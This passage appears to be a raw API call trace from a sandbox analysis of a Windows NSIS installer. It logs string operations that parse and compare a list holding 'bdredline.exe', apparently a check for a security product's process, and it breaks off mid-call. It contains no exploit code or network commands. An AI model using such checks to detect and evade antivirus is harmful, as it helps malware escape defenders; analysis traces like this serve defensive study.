returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.375] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.375] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.375] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.375] lstrcpyA (in: lpString1=0x33f5c8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.375] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.376] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.376] lstrcpynA (in: lpString1=0x3401e0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.376] lstrcpynA (in: lpString1=0x33f9d0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.376] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.376] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.376] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.376] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.376] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="1024") returned 4 [0158.376] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.376] lstrcpyA (in: lpString1=0x431400, lpString2="" | out: lpString1="") returned="" [0158.376] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="-1") returned 2 [0158.376] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.376] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.376] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.376] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.376] lstrcpyA (in: lpString1=0x430000, lpString2="0" | out: lpString1="0") returned="0" [0158.376] lstrcpynA (in: lpString1=0x42e3a0, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.376] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.376] lstrcpynA (in: lpString1=0x3387a4, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.376] lstrcpynA (in: lpString1=0x338bec, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.376] lstrcpynA (in: lpString1=0x42e3a1, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.377] lstrlenA (lpString="") returned 0 [0158.377] lstrcpynA (in: lpString1=0x339034, lpString2="/", iMaxLength=1024 | out: lpString1="/") returned="/" [0158.377] lstrcpynA (in: lpString1=0x42e3a0, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.377] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.377] lstrcpynA (in: lpString1=0x33947c, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.377] lstrcpynA (in: lpString1=0x40a418, lpString2="/", iMaxLength=1024 | out: lpString1="/") returned="/" [0158.377] lstrcpynA (in: lpString1=0x339034, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.377] lstrcpynA (in: lpString1=0x33947c, lpString2="/", iMaxLength=1024 | out: lpString1="/") returned="/" [0158.377] lstrcpynA (in: lpString1=0x430400, lpString2="/", iMaxLength=1024 | out: lpString1="/") returned="/" [0158.377] lstrcpynA (in: lpString1=0x40a418, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.377] lstrcpynA (in: lpString1=0x338bec, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.377] lstrcpynA (in: lpString1=0x339034, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.377] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.377] lstrlenA (lpString="0") returned 1 [0158.377] lstrcpynA (in: lpString1=0x33947c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.377] lstrcpynA (in: lpString1=0x40a418, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.377] lstrcpynA (in: lpString1=0x339034, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.377] lstrcpynA (in: lpString1=0x33947c, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.377] lstrcpynA (in: lpString1=0x430000, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.377] lstrcpynA (in: lpString1=0x40a418, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.377] lstrcpynA (in: lpString1=0x338bec, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.377] lstrcpynA (in: lpString1=0x339034, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.377] lstrcpynA (in: lpString1=0x40a418, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.377] lstrcpynA (in: lpString1=0x3387a4, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.377] lstrcpynA (in: lpString1=0x339034, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.377] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.378] lstrlenA (lpString="0") returned 1 [0158.378] lstrcpynA (in: lpString1=0x33947c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.378] lstrcpynA (in: lpString1=0x40a418, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.378] lstrcpynA (in: lpString1=0x339034, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.378] lstrcpynA (in: lpString1=0x33947c, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.378] lstrcpynA (in: lpString1=0x432800, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.378] lstrcpynA (in: lpString1=0x40a418, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.378] lstrcpynA (in: lpString1=0x3387a4, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.378] lstrcpynA (in: lpString1=0x339034, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.378] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.378] lstrlenA (lpString="0") returned 1 [0158.378] lstrcpynA (in: lpString1=0x33947c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.378] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3297464", iMaxLength=1024 | out: lpString1="3297464") returned="3297464" [0158.378] lstrlenA (lpString="3297464") returned 7 [0158.378] lstrcpynA (in: lpString1=0x3398c4, lpString2="3297464", iMaxLength=1024 | out: lpString1="3297464") returned="3297464" [0158.378] lstrcpynA (in: lpString1=0x42e3a0, lpString2="248", iMaxLength=1024 | out: lpString1="248") returned="248" [0158.378] lstrlenA (lpString="248") returned 3 [0158.378] lstrcpynA (in: lpString1=0x339d0c, lpString2="248", iMaxLength=1024 | out: lpString1="248") returned="248" [0158.378] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.378] lstrlenA (lpString="") returned 0 [0158.378] lstrcpynA (in: lpString1=0x33a154, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.378] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.378] lstrlenA (lpString="0") returned 1 [0158.378] lstrcpynA (in: lpString1=0x33a59c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.378] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3297464", iMaxLength=1024 | out: lpString1="3297464") returned="3297464" [0158.378] lstrlenA (lpString="3297464") returned 7 [0158.378] lstrcpynA (in: lpString1=0x33a9e4, lpString2="3297464", iMaxLength=1024 | out: lpString1="3297464") returned="3297464" [0158.379] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.379] lstrlenA (lpString="") returned 0 [0158.379] lstrcpynA (in: lpString1=0x33ae2c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.379] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.379] lstrlenA (lpString="") returned 0 [0158.379] lstrcpynA (in: lpString1=0x33b274, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.379] lstrcpynA (in: lpString1=0x42e3a0, lpString2="User", iMaxLength=1024 | out: lpString1="User") returned="User" [0158.379] lstrlenA (lpString="User") returned 4 [0158.379] lstrcpynA (in: lpString1=0x33b6bc, lpString2="User", iMaxLength=1024 | out: lpString1="User") returned="User" [0158.379] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.379] lstrlenA (lpString="") returned 0 [0158.379] lstrcpynA (in: lpString1=0x33bb04, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.379] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.379] lstrlenA (lpString="") returned 0 [0158.379] lstrcpynA (in: lpString1=0x42e3a0, lpString2="/", iMaxLength=1024 | out: lpString1="/") returned="/" [0158.379] lstrlenA (lpString="/") returned 1 [0158.379] lstrcpynA (in: lpString1=0x40a418, lpString2="/", iMaxLength=1024 | out: lpString1="/") returned="/" [0158.379] lstrlenA (lpString="/") returned 1 [0158.379] lstrcpynA (in: lpString1=0x430800, lpString2="/", iMaxLength=1024 | out: lpString1="/") returned="/" [0158.379] lstrcpynA (in: lpString1=0x42e3a0, lpString2="/", iMaxLength=1024 | out: lpString1="/") returned="/" [0158.379] lstrlenA (lpString="/") returned 1 [0158.379] lstrcpynA (in: lpString1=0x40a418, lpString2="/", iMaxLength=1024 | out: lpString1="/") returned="/" [0158.379] lstrlenA (lpString="/") returned 1 [0158.379] lstrcpynA (in: lpString1=0x430400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.379] lstrcpynA (in: lpString1=0x42e3a0, lpString2="/", iMaxLength=1024 | out: lpString1="/") returned="/" [0158.379] lstrlenA (lpString="/") returned 1 [0158.379] lstrcpynA (in: lpString1=0x40ac18, lpString2="/", iMaxLength=1024 | out: lpString1="/") returned="/" [0158.379] lstrcpynA (in: lpString1=0x40b018, lpString2="E", iMaxLength=1024 | out: lpString1="E") returned="E" [0158.379] lstrcmpiA (lpString1="/", lpString2="E") returned -1 [0158.379] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.380] lstrlenA (lpString="") returned 0 [0158.380] lstrcpynA (in: lpString1=0x42e3a0, lpString2="/", iMaxLength=1024 | out: lpString1="/") returned="/" [0158.380] lstrlenA (lpString="/") returned 1 [0158.380] lstrcpynA (in: lpString1=0x40ac18, lpString2="/", iMaxLength=1024 | out: lpString1="/") returned="/" [0158.380] lstrcpynA (in: lpString1=0x40b018, lpString2="+", iMaxLength=1024 | out: lpString1="+") returned="+" [0158.380] lstrcmpiA (lpString1="/", lpString2="+") returned -1 [0158.380] lstrcpynA (in: lpString1=0x42e3a0, lpString2="/", iMaxLength=1024 | out: lpString1="/") returned="/" [0158.380] lstrlenA (lpString="/") returned 1 [0158.380] lstrcpynA (in: lpString1=0x40ac18, lpString2="/", iMaxLength=1024 | out: lpString1="/") returned="/" [0158.380] lstrcpynA (in: lpString1=0x40b018, lpString2="-", iMaxLength=1024 | out: lpString1="-") returned="-" [0158.380] lstrcmpiA (lpString1="/", lpString2="-") returned 1 [0158.380] lstrcpynA (in: lpString1=0x42e3a0, lpString2="/", iMaxLength=1024 | out: lpString1="/") returned="/" [0158.380] lstrlenA (lpString="/") returned 1 [0158.380] lstrcpynA (in: lpString1=0x40ac18, lpString2="/", iMaxLength=1024 | out: lpString1="/") returned="/" [0158.380] lstrcpynA (in: lpString1=0x40b018, lpString2="/", iMaxLength=1024 | out: lpString1="/") returned="/" [0158.380] lstrcmpiA (lpString1="/", lpString2="/") returned 0 [0158.380] lstrcpynA (in: lpString1=0x42e3a0, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.380] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.380] lstrcpynA (in: lpString1=0x40ac18, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.380] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.380] lstrcmpiA (lpString1="bdredline.exe,", lpString2="") returned 1 [0158.380] lstrcpynA (in: lpString1=0x40a418, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.380] lstrlenA (lpString="0") returned 1 [0158.380] lstrcpynA (in: lpString1=0x431000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.380] lstrcpynA (in: lpString1=0x40a418, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.380] lstrlenA (lpString="0") returned 1 [0158.380] lstrcpynA (in: lpString1=0x431400, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.380] lstrcpynA (in: lpString1=0x40a418, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.380] lstrlenA (lpString="0") returned 1 [0158.380] lstrcpynA (in: lpString1=0x431800, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.380] lstrcpynA (in: lpString1=0x42e3a0, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.380] lstrlenA (lpString=",") returned 1 [0158.380] lstrcpynA (in: lpString1=0x40a418, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.381] lstrlenA (lpString=",") returned 1 [0158.381] wsprintfA (in: param_1=0x431c00, param_2="%d" | out: param_1="1") returned 1 [0158.381] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.381] lstrlenA (lpString="1") returned 1 [0158.381] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.381] lstrlenA (lpString="0") returned 1 [0158.381] lstrcpynA (in: lpString1=0x42e3a0, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.381] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.381] lstrcpynA (in: lpString1=0x40a418, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.381] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.381] lstrcpynA (in: lpString1=0x432000, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.381] lstrcpynA (in: lpString1=0x42e3a0, lpString2="b", iMaxLength=1024 | out: lpString1="b") returned="b" [0158.381] lstrlenA (lpString="b") returned 1 [0158.381] lstrcpynA (in: lpString1=0x42e3a1, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.381] lstrlenA (lpString="0") returned 1 [0158.381] lstrcpynA (in: lpString1=0x40ac18, lpString2="b0", iMaxLength=1024 | out: lpString1="b0") returned="b0" [0158.381] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.381] lstrcmpiA (lpString1="b0", lpString2="0") returned 1 [0158.381] lstrcpynA (in: lpString1=0x42e3a0, lpString2="b", iMaxLength=1024 | out: lpString1="b") returned="b" [0158.381] lstrlenA (lpString="b") returned 1 [0158.381] lstrcpynA (in: lpString1=0x40a418, lpString2="b", iMaxLength=1024 | out: lpString1="b") returned="b" [0158.381] lstrlenA (lpString="b") returned 1 [0158.381] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.381] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.381] lstrlenA (lpString="1") returned 1 [0158.381] lstrcpynA (in: lpString1=0x42e3a0, lpString2="b", iMaxLength=1024 | out: lpString1="b") returned="b" [0158.381] lstrlenA (lpString="b") returned 1 [0158.381] lstrcpynA (in: lpString1=0x40ac18, lpString2="b", iMaxLength=1024 | out: lpString1="b") returned="b" [0158.381] lstrcpynA (in: lpString1=0x42e3a0, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.381] lstrlenA (lpString=",") returned 1 [0158.381] lstrcpynA (in: lpString1=0x40b018, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.381] lstrcmpiA (lpString1="b", lpString2=",") returned 1 [0158.381] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.381] lstrlenA (lpString="0") returned 1 [0158.382] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="1") returned 1 [0158.382] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.382] lstrlenA (lpString="1") returned 1 [0158.382] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.382] lstrlenA (lpString="1") returned 1 [0158.382] lstrcpynA (in: lpString1=0x42e3a0, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.382] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.382] lstrcpynA (in: lpString1=0x40a418, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.382] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.382] lstrcpynA (in: lpString1=0x432000, lpString2="dredline.exe,", iMaxLength=1024 | out: lpString1="dredline.exe,") returned="dredline.exe," [0158.382] lstrcpynA (in: lpString1=0x42e3a0, lpString2="d", iMaxLength=1024 | out: lpString1="d") returned="d" [0158.382] lstrlenA (lpString="d") returned 1 [0158.382] lstrcpynA (in: lpString1=0x42e3a1, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.382] lstrlenA (lpString="0") returned 1 [0158.382] lstrcpynA (in: lpString1=0x40ac18, lpString2="d0", iMaxLength=1024 | out: lpString1="d0") returned="d0" [0158.382] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.382] lstrcmpiA (lpString1="d0", lpString2="0") returned 1 [0158.382] lstrcpynA (in: lpString1=0x42e3a0, lpString2="d", iMaxLength=1024 | out: lpString1="d") returned="d" [0158.382] lstrlenA (lpString="d") returned 1 [0158.382] lstrcpynA (in: lpString1=0x40a418, lpString2="d", iMaxLength=1024 | out: lpString1="d") returned="d" [0158.382] lstrlenA (lpString="d") returned 1 [0158.382] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.382] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.382] lstrlenA (lpString="1") returned 1 [0158.382] lstrcpynA (in: lpString1=0x42e3a0, lpString2="d", iMaxLength=1024 | out: lpString1="d") returned="d" [0158.382] lstrlenA (lpString="d") returned 1 [0158.382] lstrcpynA (in: lpString1=0x40ac18, lpString2="d", iMaxLength=1024 | out: lpString1="d") returned="d" [0158.382] lstrcpynA (in: lpString1=0x42e3a0, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.382] lstrlenA (lpString=",") returned 1 [0158.382] lstrcpynA (in: lpString1=0x40b018, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.382] lstrcmpiA (lpString1="d", lpString2=",") returned 1 [0158.383] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.383] lstrlenA (lpString="1") returned 1 [0158.383] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="2") returned 1 [0158.383] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.383] lstrlenA (lpString="1") returned 1 [0158.383] lstrcpynA (in: lpString1=0x42e3a0, lpString2="2", iMaxLength=1024 | out: lpString1="2") returned="2" [0158.383] lstrlenA (lpString="2") returned 1 [0158.383] lstrcpynA (in: lpString1=0x42e3a0, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.383] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.383] lstrcpynA (in: lpString1=0x40a418, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.383] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.383] lstrcpynA (in: lpString1=0x432000, lpString2="redline.exe,", iMaxLength=1024 | out: lpString1="redline.exe,") returned="redline.exe," [0158.383] lstrcpynA (in: lpString1=0x42e3a0, lpString2="r", iMaxLength=1024 | out: lpString1="r") returned="r" [0158.383] lstrlenA (lpString="r") returned 1 [0158.383] lstrcpynA (in: lpString1=0x42e3a1, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.383] lstrlenA (lpString="0") returned 1 [0158.383] lstrcpynA (in: lpString1=0x40ac18, lpString2="r0", iMaxLength=1024 | out: lpString1="r0") returned="r0" [0158.383] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.383] lstrcmpiA (lpString1="r0", lpString2="0") returned 1 [0158.383] lstrcpynA (in: lpString1=0x42e3a0, lpString2="r", iMaxLength=1024 | out: lpString1="r") returned="r" [0158.383] lstrlenA (lpString="r") returned 1 [0158.384] lstrcpynA (in: lpString1=0x40a418, lpString2="r", iMaxLength=1024 | out: lpString1="r") returned="r" [0158.384] lstrlenA (lpString="r") returned 1 [0158.384] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.384] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.384] lstrlenA (lpString="1") returned 1 [0158.384] lstrcpynA (in: lpString1=0x42e3a0, lpString2="r", iMaxLength=1024 | out: lpString1="r") returned="r" [0158.384] lstrlenA (lpString="r") returned 1 [0158.384] lstrcpynA (in: lpString1=0x40ac18, lpString2="r", iMaxLength=1024 | out: lpString1="r") returned="r" [0158.384] lstrcpynA (in: lpString1=0x42e3a0, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.384] lstrlenA (lpString=",") returned 1 [0158.384] lstrcpynA (in: lpString1=0x40b018, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.384] lstrcmpiA (lpString1="r", lpString2=",") returned 1 [0158.384] lstrcpynA (in: lpString1=0x42e3a0, lpString2="2", iMaxLength=1024 | out: lpString1="2") returned="2" [0158.384] lstrlenA (lpString="2") returned 1 [0158.384] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="3") returned 1 [0158.384] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.384] lstrlenA (lpString="1") returned 1 [0158.384] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3", iMaxLength=1024 | out: lpString1="3") returned="3" [0158.384] lstrlenA (lpString="3") returned 1 [0158.384] lstrcpynA (in: lpString1=0x42e3a0, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.384] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.384] lstrcpynA (in: lpString1=0x40a418, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.384] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.384] lstrcpynA (in: lpString1=0x432000, lpString2="edline.exe,", iMaxLength=1024 | out: lpString1="edline.exe,") returned="edline.exe," [0158.384] lstrcpynA (in: lpString1=0x42e3a0, lpString2="e", iMaxLength=1024 | out: lpString1="e") returned="e" [0158.384] lstrlenA (lpString="e") returned 1 [0158.384] lstrcpynA (in: lpString1=0x42e3a1, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.384] lstrlenA (lpString="0") returned 1 [0158.384] lstrcpynA (in: lpString1=0x40ac18, lpString2="e0", iMaxLength=1024 | out: lpString1="e0") returned="e0" [0158.384] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.384] lstrcmpiA (lpString1="e0", lpString2="0") returned 1 [0158.384] lstrcpynA (in: lpString1=0x42e3a0, lpString2="e", iMaxLength=1024 | out: lpString1="e") returned="e" [0158.384] lstrlenA (lpString="e") returned 1 [0158.384] lstrcpynA (in: lpString1=0x40a418, lpString2="e", iMaxLength=1024 | out: lpString1="e") returned="e" [0158.384] lstrlenA (lpString="e") returned 1 [0158.384] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.384] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.384] lstrlenA (lpString="1") returned 1 [0158.384] lstrcpynA (in: lpString1=0x42e3a0, lpString2="e", iMaxLength=1024 | out: lpString1="e") returned="e" [0158.384] lstrlenA (lpString="e") returned 1 [0158.384] lstrcpynA (in: lpString1=0x40ac18, lpString2="e", iMaxLength=1024 | out: lpString1="e") returned="e" [0158.384] lstrcpynA (in: lpString1=0x42e3a0, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.384] lstrlenA (lpString=",") returned 1 [0158.384] lstrcpynA (in: lpString1=0x40b018, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.384] lstrcmpiA (lpString1="e", lpString2=",") returned 1 [0158.384] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3", iMaxLength=1024 | out: lpString1="3") returned="3" [0158.384] lstrlenA (lpString="3") returned 1 [0158.385] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="4") returned 1 [0158.385] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.385] lstrlenA (lpString="1") returned 1 [0158.385] lstrcpynA (in: lpString1=0x42e3a0, lpString2="4", iMaxLength=1024 | out: lpString1="4") returned="4" [0158.385] lstrlenA (lpString="4") returned 1 [0158.385] lstrcpynA (in: lpString1=0x42e3a0, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.385] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.385] lstrcpynA (in: lpString1=0x40a418, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.385] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.385] lstrcpynA (in: lpString1=0x432000, lpString2="dline.exe,", iMaxLength=1024 | out: lpString1="dline.exe,") returned="dline.exe," [0158.385] lstrcpynA (in: lpString1=0x42e3a0, lpString2="d", iMaxLength=1024 | out: lpString1="d") returned="d" [0158.385] lstrlenA (lpString="d") returned 1 [0158.385] lstrcpynA (in: lpString1=0x42e3a1, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.385] lstrlenA (lpString="0") returned 1 [0158.385] lstrcpynA (in: lpString1=0x40ac18, lpString2="d0", iMaxLength=1024 | out: lpString1="d0") returned="d0" [0158.385] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.385] lstrcmpiA (lpString1="d0", lpString2="0") returned 1 [0158.385] lstrcpynA (in: lpString1=0x42e3a0, lpString2="d", iMaxLength=1024 | out: lpString1="d") returned="d" [0158.385] lstrlenA (lpString="d") returned 1 [0158.385] lstrcpynA (in: lpString1=0x40a418, lpString2="d", iMaxLength=1024 | out: lpString1="d") returned="d" [0158.385] lstrlenA (lpString="d") returned 1 [0158.385] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.385] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.385] lstrlenA (lpString="1") returned 1 [0158.385] lstrcpynA (in: lpString1=0x42e3a0, lpString2="d", iMaxLength=1024 | out: lpString1="d") returned="d" [0158.385] lstrlenA (lpString="d") returned 1 [0158.385] lstrcpynA (in: lpString1=0x40ac18, 